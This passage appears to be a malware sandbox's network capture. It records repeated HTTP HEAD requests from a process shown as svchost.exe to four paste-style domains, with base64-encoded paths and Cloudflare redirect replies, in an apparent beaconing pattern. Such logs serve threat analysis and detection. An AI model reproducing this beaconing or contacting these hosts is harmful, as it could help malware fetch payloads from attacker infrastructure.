                                                              107 | 192.168.2.7 | 50296 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:16.319017887 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:16.775712013 CET | 882 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:16 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:16 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qWVLna%2FjuBnyKB%2BOMx1dpjCuDWP8iKsAjDymHVTwq%2Fkj70mWn%2FEaoUNPlIpg%2Fri4sFysgQs8y54uPLShuVLfydWb%2FulPOi%2B4yYZsL%2B67o8JYqLUUR3lVafPiKgi0SZL8GW8%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4357ee9c425-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1479&min_rtt=1479&rtt_var=739&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              108 | 192.168.2.7 | 50297 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:16.597207069 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:17.058357954 CET | 875 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:17 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:17 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OyUQkzTY%2BXTo7FUQjUZBL7o2GYG5tnl4zzDxjYTfrRxryPcgP0KfY%2BZY98I1q9NjfRUmTQE5KBneBHTe35Lh59i%2Btj1tmfTtzzIo0JBDXBZQpipv2giOjuP3PumiXMGg9fKb"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4374b4d7c6a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1948&min_rtt=1948&rtt_var=974&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              109 | 192.168.2.7 | 50299 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:16.782347918 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:17.255031109 CET | 862 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:17 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:17 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2F%2Bq9MEoIqAr0Kpc8sa8z01DuRWKk3L38gxhi%2FBUEl5BK%2F8KTToK1XQlY7dNKDIkjIefYjbYdBzobdZTSEURiRW6tTOt3pQQS5lmslR8Hp8GDGROL6bgXzJyeUgBCpAy"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4387e340fab-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1464&min_rtt=1464&rtt_var=732&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              110 | 192.168.2.7 | 50304 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:17.261694908 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:17.738234997 CET | 875 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:17 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:17 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vxZwNZSrFcsy4tWcZiAyzd4h%2BkxMlI6Ayx%2BpZS4C4KMcfO2B%2FbKVf0WI%2BWujaUXw8QkGg1PsEYQHuFb1QMzQVnq8kJSgKYsc%2FHJDf7lTBEvSpdW20frLKC8eTZpUyepGiuwn"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc43b7f60440e-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1586&rtt_var=793&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              111 | 192.168.2.7 | 50306 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:17.540326118 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:17.993443012 CET | 876 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:17 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:17 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R1L3%2BoaypDoxPyZt93e%2FJ2nnvD6WuMEr09OPk0gUWwAO1n4vnAuNSetgLaBWBlpo%2Fm4PaY5cFNJOAAIT%2BuBn5n48lkEglYBwyxn%2FdD80PLmPBQvqchgR5wmxXneHRGl0asc%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc43d28bb4378-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1564&rtt_var=782&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              112 | 192.168.2.7 | 50308 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:17.744788885 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:18.194657087 CET | 877 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:18 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:18 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4B8ZEGqaBgrehNGukFjIJjpmCUkl0f4p9t778OhzU%2BuoR4fgt%2BQM70VUTpwzIQtasLh7pJ20LOdQRf%2FQPdPNsWTrbS%2BXFcA0EnjRrH7gbRD8bX3EfOWAfTWnPPOuAJfQAJjY"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc43e6f997c6a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1970&min_rtt=1970&rtt_var=985&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              113 | 192.168.2.7 | 50310 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:18.001146078 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:18.455535889 CET | 862 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:18 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:18 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CzPJBIc3NaV9PE%2FSoNb8Qxzps%2BHp6CMEzNhaEHnhQK9iXIvxva5xBZg0NzVqRHS%2BpKjoQCOXnSregNEaa1DESwbYZV7lBxqeNYB%2F1snpMDgm5eopLbJegd6JkxdbRYFa"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4400aba43ef-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1753&min_rtt=1753&rtt_var=876&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              114 | 192.168.2.7 | 50315 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:18.465682030 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:18.937992096 CET | 871 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:18 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:18 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=maVPfynt%2BXM9ZcgdaazgKK1XdRoqtM9JaCCPoczc%2FzVMZ7FeWw3XNG1JoMkqeZqzkK70yHzqO5vgF10PhtMo4orgBWSQxrW9K659Bsxkl50wOi9o3gwK4F8fPpw%2BYYj51Z5t"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4430b38420d-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1775&min_rtt=1775&rtt_var=887&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              115 | 192.168.2.7 | 50317 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:18.682122946 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:19.165075064 CET | 876 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:19 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:19 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6E3Fv8t5Svf1rdlDH1y6JRyu18nKo1fUAHRw%2FRZytCBG%2F2QsWTdbulsSqr%2B%2BAJP%2FkCCgc0wO9W3as5VuH8bFIkLymwVYfsPAySfZqRuDTxj1s4GcBtp5n7Ee95aZuWL1LPo%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4446961726e-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1918&min_rtt=1918&rtt_var=959&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              116 | 192.168.2.7 | 50319 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:18.967952967 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:19.425389051 CET | 877 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:19 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:19 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9mQ3Ig%2BZdGikewLoszBBYnqXJr5a3nuXUQvkJhwcnuoeLDgYT2HmQEN85qEDiTiSpMl0Mvi4Eh8R%2Fi3Y0YYdGFCaWwidvrHIXJ9mbAFaL4C2VpvnW3%2Bkhgc1UENTWkj%2Fr6qN"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4461f6b42e9-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1598&rtt_var=799&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              117 | 192.168.2.7 | 50321 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:19.192089081 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:19.642623901 CET | 858 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:19 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:19 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rVtmVLtd9RA9C6LgHZLnqfHslrKOZoC14Eu3eNNfPngRcVjrf72mDT2EMDdtJYqqih0NGyKh%2Fozpxio81dlccAGkKMgsvSRcLLV2UmSNgJ1idRdU%2BXM1LEXrlyXIted9"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc447791befa1-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1977&min_rtt=1977&rtt_var=988&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=163&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              118 | 192.168.2.7 | 50326 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:19.683811903 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:20.144347906 CET | 875 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:20 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:20 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I1Nl5K4y%2BapY0Zc5Vut0K1EgtxI60pCQNJwy37crQXjJSBLN%2BCw4DFh%2Bokpw3vm3ZQ9EsstdcYySKDArXjnLpm9uHqSfkDdreHAPE85WuvMQcMUEuyGUcY%2BrFUb7u6%2FffC4J"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc44a8b21436f-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1518&min_rtt=1518&rtt_var=759&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              119 | 192.168.2.7 | 50329 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:20.251477957 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:20.726183891 CET | 876 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:20 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:20 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9UdvBzDEDCfUQApKtNTyypUXiHku5Kb7zjH3iCkhwHkqA9kxc%2BQ1%2F8u6txJ%2BJx%2BdjiRCRTev5yHf4NKDekGLpnvnWSuqfS240a78ukBRvVrxGHsveI%2B9svgRMViLUarZIss%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc44e2d074369-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1579&rtt_var=789&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              120 | 192.168.2.7 | 50330 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:20.323273897 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:20.787805080 CET | 887 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:20 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:20 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BRnTzLzEypN8QIS008d5i%2BaF%2BoieYszt03QlZUBF%2F0cLLaUC3Cp0BVU3DucC7OG1g3ZzavENiFLEVrgp4I6ib4hwN%2FPn7%2FqN4jZyfNZrEd%2Fc%2BIR15D0T9Q%2FihnFbUARcuVd8"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc44e9f9b4414-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1698&min_rtt=1698&rtt_var=849&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              121 | 192.168.2.7 | 50332 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:20.732248068 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:21.186387062 CET | 860 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:21 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:21 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bTKyaxIfwyek0ypUV0JaV0bq62umQzdbT3k%2BL0ZxtOKKaUkBjUPCo6AodT5QIA0hDcsV405MadpNicAFmi3tjtR0ROkgE%2Fv%2BMqpHIT70C8UgMcdw9xpea3QXlPMSuRvI"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4511c085e60-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1708&rtt_var=854&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              122 | 192.168.2.7 | 50337 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:21.192483902 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:21.664077044 CET | 869 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:21 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:21 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jTADVErcSL2L6KucFFQ8OWYBdVVu2KBgDNzBQ8wbZQSY%2F9KRPascfb0mcEwIiJakpagC1O%2BTGR8quMjCmAkmR12x9C9epXwyifMNumoWwCzt9oGJ55lbPuaKyoZl5JziTvaM"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4540c7142cc-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1749&min_rtt=1749&rtt_var=874&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              123 | 192.168.2.7 | 50339 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:21.282342911 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:21.729758024 CET | 868 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:21 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:21 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xBlpsishq66XXZteDCgCGaQkaKnxOClFed5C93skkpv5x%2Ffei3BYEmR33qG4qbEIPyREej4v5iV76Tmh1CNsHnj7j2cDFxsFnQt6i7vvtpOS92zh6ah80NjKj3QJ5PNNmR8%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4548888efa9-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1982&rtt_var=991&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              124 | 192.168.2.7 | 50341 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:21.670886040 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
